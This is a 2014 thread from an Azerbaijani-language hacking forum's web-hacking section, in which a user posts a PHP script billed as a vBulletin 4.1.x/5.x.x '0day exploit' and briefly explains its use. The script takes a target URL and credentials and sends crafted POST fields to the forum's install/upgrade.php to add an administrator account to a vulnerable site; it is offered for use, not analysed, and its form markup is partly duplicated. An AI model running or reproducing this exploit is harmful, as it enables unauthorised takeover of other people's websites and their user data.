Anti-armenia.ORG - Forumlar - vBulletin 4.1.x/5.x.x upgrade

Forumlar / Hacking Platform / Web Hacking & Security / vBulletin 4.1.x/5.x.x upgrade

Istifadəçi

2014-01-07 00:28 GMT

TheLock

Gold

Mesaj Sayı : 412

Mövzu Sayı :

Rep Ver :

Rep Sayı : 18

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər :

Ölkə :

Məslək :

Yaş :

Mesaj :

Kod:
<center><h1>vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit</h1>
<?php
//extract data from the post
if(isset($_POST[’submit’])){
extract($_POST);

//set POST variables
$url = $_POST[’url’];
$fields = array(
’ajax’ => urlencode(’1’),
’version’ => urlencode(’install’),
’checktable’ => urlencode(’false’),
’firstrun’ => urlencode(’false’),
’step’ => urlencode(’7’),
’startat’ => urlencode(’0’),
’only’ => urlencode(’false’),
’customerid’ => urlencode($_POST[’customerid’]),
’options[skiptemplatemerge]’ => urlencode(’0’),
’response’ => urlencode(’yes’),
’htmlsubmit’ => urlencode(’1’),
’htmldata[username]’ => urlencode($_POST[’username’]),
’htmldata[password]’ => urlencode($_POST[’password’]),
’htmldata[confirmpassword]’ => urlencode($_POST[’password’]),
’htmldata[email]’ => urlencode($_POST[’email’])
);

//url-ify the data for the POST
foreach($fields as $key=>$value) { $fields_string .= $key.’=’.$value.’&’; }
rtrim($fields_string, ’&’);

//open connection
$ch = curl_init();

//set the url, number of POST vars, POST data
curl_setopt($ch,CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_POST, count($fields));
curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, ’bbcustomerid=’.$_POST[’customerid’] );

//execute post
$result = curl_exec($ch);

//close connection
curl_close($ch);
exit();
}
?>
<center>
<form name="sploit" method="POST" action="<?php echo $_SERVER[’REQUEST_URI’]; ?>">
<span>Example:http://test.com/forum/install/upgrade.php</span><br>
<span>Website:</span>
<input name="url" type="text" tabindex="1" size="60" />
<br>
<span>Customer ID:</span>
<input name="customerid" type="text" tabindex="2" size="40" />
<br>
<span>Username:</span>
<input name="username" type="text" tabindex="3" size="40" />
<br>
<span>Password:</span>
<input name="password" type="text" tabindex="4" size="40" />
<br>
<span>Email:</span>
<input name="email" type="text" tabindex="5" maxlength="40" />

<input name="submit" type="submit" value="Admin ekle :)">
</form>
</center>
" />

<input name="submit" type="submit" value="Admin ekle ">
</form>
</center>[/code]

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png

Anti-armenia.ORG

Istifadəçi

2014-01-07 00:48 GMT

By_Hummet

Banned

Mesaj Sayı : 527

Mövzu Sayı :

Rep Ver :

Rep Sayı : 34

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər :

Ölkə :

Məslək :

Yaş : 30

Mesaj :

BU Nədir ... Nə Ücündür ..

Anti-armenia.ORG

Istifadəçi

2014-01-07 00:52 GMT

TheLock

Gold

Mesaj Sayı : 412

Mövzu Sayı :

Rep Ver :

Rep Sayı : 18

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər :

Ölkə :

Məslək :

Yaş :

Mesaj :

vBulletin açığı,bu şəkildə olur:
http://sayt.com/core/install/upgrade.php
Bu script ilə həmin açıqlı sayta admin əlavə etmək olur.

Anti-armenia.ORG

Istifadəçi

2014-01-07 00:55 GMT

By_Hummet

Banned

Mesaj Sayı : 527

Mövzu Sayı :

Rep Ver :

Rep Sayı : 34

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər :

Ölkə :

Məslək :

Yaş : 30

Mesaj :

Sitat
#28355 TheLock :
vBulletin açığı,bu şəkildə olur:
http://sayt.com/core/install/upgrade.php
Bu script ilə həmin açıqlı sayta admin əlavə etmək olur.

Video Olsa Və Yaxud Mövzu Ətrafli Olsa ... Əla Olardi Mövzuda Başa Salmaq Lazimdir Nəyin - Nə Olduğunu Yeni Nəsil Ücün Yarari Olardi ... Yenədə Zəhmət Var Çoox Sağolun

Anti-armenia.ORG